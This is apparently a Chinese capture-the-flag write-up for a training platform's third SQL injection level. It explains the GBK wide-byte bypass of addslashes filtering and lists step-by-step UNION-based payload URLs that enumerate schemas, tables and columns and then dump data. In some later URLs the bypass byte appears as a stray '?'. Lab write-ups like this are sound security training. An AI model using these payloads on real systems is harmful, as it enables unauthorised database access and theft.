网络信息安全攻防学习平台|网络信息安全攻防学习平台 注入关第三

防注入分值: 300
小明终于知道,原来黑客如此的吊,还有sql注入这种高端技术,因此他开始学习防注入!
通关地址
老办法,没有信息就看F12呗
html里面有一个tipid=1

ok 知道该怎么做了http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1




然后尝试来一个单引号 '
界面不行了,啥也没有,说明waf过滤了单引号,
这个时候就要考虑到用宽字节%df绕过
经测试,只要是宽字节都可以比如使用%e0。
ascii码大于127的均为宽子节
【网络信息安全攻防学习平台|网络信息安全攻防学习平台 注入关第三】这里略带一提
该漏洞最早2006年被国外用来讨论数据库字符集设为GBK时,0xbf27本身不是一个有效的GBK字符,但经过addslashes()
转换后变为0xbf5c27,前面的0xbf5c是个有效的GBK字符,所以0xbf5c27会被当作一个字符0xbf5c和一个单引号来处理,结果漏洞就触发了
也就是说:%df\’ = %df%5c%27=縗’,有了单引号就好注入了




GBK编码,它的编码范围是0x8140~0xFEFE(不包括xx7F),在遇到%df(ascii(223)) >ascii(128)时自动拼接%5c,因此吃掉‘\’,
在这里 %5c就是‘\’
%df在碰到%5c后,会被拼接在一起变成
而%27、%20小于ascii(128)的字符就保留了。
若有些关于unicod,utf-8,gbk,之类的不清楚的可以查一下知乎以及http://www.91ri.org/8611.html
我们在输入了
?id=2%df%27%20order%20by%203%23
实际上等于?id=2%df' order by 3#
?id=2%df%27%20order%20by%204%23
之后,可以判断出,字段数为3
then
lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2%df%27%20UNION%20SELECT%201,2,3%23


网络信息安全攻防学习平台|网络信息安全攻防学习平台 注入关第三
文章图片
出现了2和3 接下去按着前一篇文章慢慢来
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2%bf%27%20union%20select%201,concat(group_concat(distinct+schema_name)),3%20from%20information_schema.schemata%23
这个url有点长啊。。。主要用到的是concat(group_concat(distinct+schema_name))
至于每个函数的功能自己查吧


网络信息安全攻防学习平台|网络信息安全攻防学习平台 注入关第三
文章图片
然后就是自己翻用这个
concat(group_concat(distinct+table_name))
打开mydbs
别打开test了。。。我已经打开过了。里面啥都没有!!


网络信息安全攻防学习平台|网络信息安全攻防学习平台 注入关第三
文章图片
next
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2?' union select 1,concat(group_concat(distinct+column_name )),3 from information_schema.columns where table_name=0x7361655F757365725F73716C6934#


网络信息安全攻防学习平台|网络信息安全攻防学习平台 注入关第三
文章图片
胜利就在前方!!!
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2?' union select 1,concat(group_concat(id,0x3a,title_1,0x3a,content_1)),3 from sae_user_sqli4 #


网络信息安全攻防学习平台|网络信息安全攻防学习平台 注入关第三
文章图片
OK了,这两道题的套路都还差不多了,希望大家多熟悉熟悉

    推荐阅读